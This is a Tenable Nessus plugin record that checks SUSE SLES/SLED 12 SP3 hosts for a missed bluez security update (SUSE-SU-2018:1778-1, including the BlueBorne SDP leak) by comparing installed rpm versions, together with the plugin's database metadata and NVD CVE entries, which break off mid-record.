ID SUSE_SU-2018-1778-1.NASL Type nessus Reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-02-02T00:00:00
Description
This update for bluez fixes the following issues: Security issues
fixed :
CVE-2016-9800: Fix hcidump memory leak in
pin_code_reply_dump() (bsc#1013721).
CVE-2016-9804: Fix hcidump buffer overflow in
commands_dump() (bsc#1013877).
CVE-2016-7837: Fix possible buffer overflow, make sure
we don't write past the end of the array (bsc#1026652).
CVE-2017-1000250: Fix information disclosure
vulnerability in service_search_attr_req (bsc#1057342).
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2018:1778-1.
# The text itself is copyright (C) SUSE.
#
include("compat.inc");
if (description)
{
script_id(110661);
script_version("1.5");
script_cvs_date("Date: 2019/09/10 13:51:48");
# Four bluez CVEs rolled into SUSE-SU-2018:1778-1: three memory-safety bugs in
# the hcidump / userland tooling (CVE-2016-7837, CVE-2016-9800, CVE-2016-9804)
# and the BlueBorne SDP information leak in bluetoothd (CVE-2017-1000250).
script_cve_id("CVE-2016-7837", "CVE-2016-9800", "CVE-2016-9804", "CVE-2017-1000250");
script_name(english:"SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)");
script_summary(english:"Checks rpm output for the updated packages.");
script_set_attribute(
attribute:"synopsis",
value:"The remote SUSE host is missing one or more security updates."
);
# Description text is the SUSE advisory verbatim. NOTE(review): SUSE labels
# CVE-2016-9800 a "memory leak", whereas NVD describes it as a buffer overflow
# of the "pin" array in tools/parser/hci.c pin_code_reply_dump(); both the
# hcidump issues (9800/9804) are triggered by parsing a crafted dump file.
script_set_attribute(
attribute:"description",
value:
"This update for bluez fixes the following issues: Security issues
fixed :
- CVE-2016-9800: Fix hcidump memory leak in
pin_code_reply_dump() (bsc#1013721).
- CVE-2016-9804: Fix hcidump buffer overflow in
commands_dump() (bsc#1013877).
- CVE-2016-7837: Fix possible buffer overflow, make sure
we don't write past the end of the array (bsc#1026652).
- CVE-2017-1000250: Fix information disclosure
vulnerability in service_search_attr_req (bsc#1057342).
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
# One SUSE bugzilla link per bsc# in the advisory, then one suse.com CVE page
# per CVE, then the advisory announcement itself (via a nessus.org short link).
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.suse.com/show_bug.cgi?id=1013721"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.suse.com/show_bug.cgi?id=1013877"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.suse.com/show_bug.cgi?id=1026652"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.suse.com/show_bug.cgi?id=1057342"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-7837/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-9800/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2016-9804/"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.suse.com/security/cve/CVE-2017-1000250/"
);
# https://www.suse.com/support/update/announcement/2018/suse-su-20181778-1/
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?c33bbd46"
);
# NOTE(review): only the 12-SP3 patch IDs are offered, which matches the SP
# gate enforced below. SLES 12 GA-LTSS / 12-SP1-LTSS / SAP 12-SP1 received the
# same fixes (plus CVE-2016-9801 and CVE-2016-9918) under SUSE-SU-2019:0510-1;
# those hosts are audited out here, not reported, so a clean result from this
# plugin says nothing about them.
script_set_attribute(
attribute:"solution",
value:
"To install this SUSE Security Update use the SUSE recommended
installation methods like YaST online_update or 'zypper patch'.
Alternatively you can run the command listed for your product :
SUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch
SUSE-SLE-WE-12-SP3-2018-1194=1
SUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t
patch SUSE-SLE-SDK-12-SP3-2018-1194=1
SUSE Linux Enterprise Server 12-SP3:zypper in -t patch
SUSE-SLE-SERVER-12-SP3-2018-1194=1
SUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch
SUSE-SLE-DESKTOP-12-SP3-2018-1194=1"
);
# NOTE(review): the v2 and v3 vectors are taken from different CVEs. The
# CVSSv2 vector (5.0, AV:N/A:P) matches NVD's scoring of the hcidump parser
# bugs CVE-2016-9800/9804, which NVD flags acInsufInfo (they need a crafted
# dump file, not remote traffic). The CVSSv3 vector (7.8, AV:L/PR:L) matches
# NVD's CVE-2016-7837 (local buffer overflow in userland utilities). The only
# issue here reachable over the air is the BlueBorne SDP leak CVE-2017-1000250,
# which NVD rates AV:A with C:H/I:N/A:N. Treat the headline score as an upper
# bound and triage by whether bluetoothd is actually exposed on the host.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
# Local (credentialed) check; the CPE list mirrors the package names tested by
# the rpm_check calls below (bluez-cups* exist only on SLED).
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-cups");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-cups-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:bluez-debugsource");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libbluetooth3");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");
# vuln_publication_date is the earliest CVE (CVE-2016-9800/9804, 2016-12-03);
# the BlueBorne CVE itself was published 2017-09-12 and the SUSE patch 2018-06-21.
script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/03");
script_set_attribute(attribute:"patch_publication_date", value:"2018/06/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/22");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
# Needs the SSH-collected release string, CPU and rpm list; when any of these
# KB keys is missing the plugin audits out instead of producing a finding.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Gate 1: this is a local check, so bail out unless host facts were
# collected over SSH by ssh_get_info.nasl.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

# Gate 2: the release string must identify a SUSE Linux Enterprise
# Server/Desktop host on the 12 line. os_ver is left as a global because
# the SP gate and the audit messages further down read it.
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)")
  audit(AUDIT_OS_NOT, "SUSE");

ver_match = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(ver_match))
  audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = ver_match[1];

# Captured text is always SLE[SD] followed by digits, so a plain string
# comparison is equivalent to the anchored regex check.
if (os_ver != "SLED12" && os_ver != "SLES12")
  audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver);

# Gate 3: without the package inventory there is nothing to compare.
if (!get_kb_item("Host/SuSE/rpm-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);
# Architecture gate: the advisory ships packages for 32-bit x86, x86_64 and
# s390x only; anything else is reported as "not implemented", not as clean.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
supported_arch = (cpu =~ "^i[3-6]86$") || ("x86_64" >< cpu) || ("s390x" >< cpu);
if (!supported_arch)
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

# Service-pack gate: the fix is published for SP3 only. os_ver is already
# known to be SLES12 or SLED12 at this point, so one check covers both
# product lines and yields the same "<product> SP3" audit text.
# NOTE(review): hosts on SP0/SP1/SP2 are audited out here, NOT flagged,
# even though they may still lack the fix (SLES 12 GA/SP1 LTSS are covered
# by the separate SUSE-SU-2019:0510-1 plugin).
sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (! preg(pattern:"^(3)$", string:sp))
  audit(AUDIT_OS_NOT, os_ver + " SP3", os_ver + " SP" + sp);
flag = 0;

# Fixed version-release from the advisory; every package built from the
# bluez source RPM carries the same one.
fixed = "5.13-5.4.1";

# SLES 12 SP3: no cpu filter (all three architectures admitted above).
foreach pkg (make_list("bluez", "bluez-debuginfo", "bluez-debugsource",
                       "libbluetooth3", "libbluetooth3-debuginfo"))
{
  if (rpm_check(release:"SLES12", sp:"3", reference:pkg + "-" + fixed)) flag++;
}

# SLED 12 SP3: x86_64 only, and additionally ships the bluez-cups backend.
foreach pkg (make_list("bluez", "bluez-cups", "bluez-cups-debuginfo",
                       "bluez-debuginfo", "bluez-debugsource",
                       "libbluetooth3", "libbluetooth3-debuginfo"))
{
  if (rpm_check(release:"SLED12", sp:"3", cpu:"x86_64", reference:pkg + "-" + fixed)) flag++;
}
if (!flag)
{
  # Nothing below the fixed version. Distinguish "bluez present and already
  # patched" from "bluez not installed" so the audit message is accurate.
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "bluez");
}
else
{
  # At least one package is older than 5.13-5.4.1. Reported as a
  # medium-severity (security_warning) local finding; the per-package
  # installed-vs-required list is attached only when verbosity > 0.
  # NOTE(review): this is a pure version comparison -- it does not check
  # whether bluetoothd is running or a Bluetooth controller is present, which
  # is what decides real exposure to the BlueBorne SDP leak (CVE-2017-1000250).
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
{"id": "SUSE_SU-2018-1778-1.NASL", "bulletinFamily": "scanner", "title": "SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)", "description": "This update for bluez fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-9800: Fix hcidump memory leak in\n pin_code_reply_dump() (bsc#1013721).\n\n - CVE-2016-9804: Fix hcidump buffer overflow in\n commands_dump() (bsc#1013877).\n\n - CVE-2016-7837: Fix possible buffer overflow, make sure\n we don't write past the end of the array (bsc#1026652).\n\n - CVE-2017-1000250: Fix information disclosure\n vulnerability in service_search_attr_req (bsc#1057342).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2018-06-22T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/110661", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-1000250/", "https://bugzilla.suse.com/show_bug.cgi?id=1013721", "https://www.suse.com/security/cve/CVE-2016-9800/", "https://www.suse.com/security/cve/CVE-2016-7837/", "http://www.nessus.org/u?c33bbd46", "https://bugzilla.suse.com/show_bug.cgi?id=1057342", "https://bugzilla.suse.com/show_bug.cgi?id=1026652", "https://bugzilla.suse.com/show_bug.cgi?id=1013877", "https://www.suse.com/security/cve/CVE-2016-9804/"], "cvelist": ["CVE-2016-7837", "CVE-2017-1000250", "CVE-2016-9800", "CVE-2016-9804"], "type": "nessus", "lastseen": "2021-02-01T06:46:21", "edition": 26, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000250", "CVE-2016-7837", "CVE-2016-9804", "CVE-2016-9800"]}, {"type": "nessus", "idList": ["FEDORA_2017-FE95A5B88B.NASL", "CENTOS_RHSA-2017-2685.NASL", "ORACLELINUX_ELSA-2017-2685.NASL", "SUSE_SU-2019-0510-1.NASL", "DEBIAN_DSA-3972.NASL", "NEWSTART_CGSL_NS-SA-2019-0117_BLUEZ.NASL", "SLACKWARE_SSA_2017-258-01.NASL", "EULEROS_SA-2019-1378.NASL", "VIRTUOZZO_VZLSA-2017-2685.NASL", "OPENSUSE-2017-1176.NASL"]}, {"type": "redhat", "idList": ["RHSA-2017:2685"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1103-1:B4D85", "DEBIAN:DSA-3972-1:ACF5D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310882765", "OPENVAS:1361412562310882767", "OPENVAS:1361412562311220191378", "OPENVAS:1361412562310843301", "OPENVAS:1361412562310891103", "OPENVAS:1361412562311220192380", "OPENVAS:1361412562310811768", "OPENVAS:1361412562311220192559", "OPENVAS:1361412562310703972", "OPENVAS:1361412562310873368"]}, {"type": "centos", "idList": ["CESA-2017:2685"]}, {"type": "archlinux", "idList": ["ASA-201709-3"]}, {"type": "slackware", "idList": ["SSA-2017-258-01"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2685"]}, {"type": "fedora", "idList": ["FEDORA:2F41461DF302", "FEDORA:211166075B57"]}, {"type": "ubuntu", "idList": ["USN-4311-1", 
"USN-3413-1"]}, {"type": "jvn", "idList": ["JVN:38755305"]}, {"type": "thn", "idList": ["THN:649BE2C710B04C213ECB85D95D5F229A", "THN:4141386ABD9B9D1290E4A6EAD271B02B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:4259-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789258", "MYHACK58:62201789526"]}, {"type": "threatpost", "idList": ["THREATPOST:73E805ED92B364393EDD601647FE122D"]}, {"type": "seebug", "idList": ["SSV:96467"]}, {"type": "cert", "idList": ["VU:240311"]}, {"type": "lenovo", "idList": ["LENOVO:PS500141-NOSID"]}, {"type": "pentestit", "idList": ["PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF"]}, {"type": "nvidia", "idList": ["NVIDIA:4561"]}], "modified": "2021-02-01T06:46:21", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-02-01T06:46:21", "rev": 2}, "vulnersScore": 8.0}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1778-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110661);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2016-7837\", \"CVE-2016-9800\", \"CVE-2016-9804\", \"CVE-2017-1000250\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : bluez (SUSE-SU-2018:1778-1) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bluez fixes the following issues: Security issues\nfixed :\n\n - CVE-2016-9800: Fix hcidump memory leak in\n pin_code_reply_dump() (bsc#1013721).\n\n - CVE-2016-9804: Fix hcidump buffer overflow in\n commands_dump() (bsc#1013877).\n\n - CVE-2016-7837: Fix possible buffer overflow, make sure\n we don't 
write past the end of the array (bsc#1026652).\n\n - CVE-2017-1000250: Fix information disclosure\n vulnerability in service_search_attr_req (bsc#1057342).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1026652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9800/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9804/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000250/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181778-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c33bbd46\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-1194=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch 
SUSE-SLE-SDK-12-SP3-2018-1194=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1194=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-1194=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bluez-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bluez-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"bluez-debugsource-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libbluetooth3-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libbluetooth3-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-cups-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-cups-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-debuginfo-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"bluez-debugsource-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libbluetooth3-5.13-5.4.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libbluetooth3-debuginfo-5.13-5.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "110661", "cpe": ["p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo", "p-cpe:/a:novell:suse_linux:bluez", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:bluez-cups", "p-cpe:/a:novell:suse_linux:bluez-debuginfo", "p-cpe:/a:novell:suse_linux:libbluetooth3", 
"p-cpe:/a:novell:suse_linux:bluez-cups-debuginfo", "p-cpe:/a:novell:suse_linux:bluez-debugsource"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2021-02-02T06:36:31", "description": "All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-12T17:29:00", "title": "CVE-2017-1000250", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000250"], "modified": "2018-02-17T02:29:00", "cpe": ["cpe:/a:bluez:bluez:5.46"], "id": "CVE-2017-1000250", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000250", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.46:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:14", "description": "In BlueZ 5.42, a buffer overflow was observed in \"commands_dump\" function in \"tools/parser/csr.c\" source file. 
The issue exists because \"commands\" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame \"frm->ptr\" parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-03T06:59:00", "title": "CVE-2016-9804", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9804"], "modified": "2016-12-07T19:29:00", "cpe": ["cpe:/a:bluez:bluez:5.42"], "id": "CVE-2016-9804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9804", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.42:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:11", "description": "Buffer overflow in BlueZ 5.41 and earlier allows an attacker to execute arbitrary code via the parse_line function used in some userland utilities.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
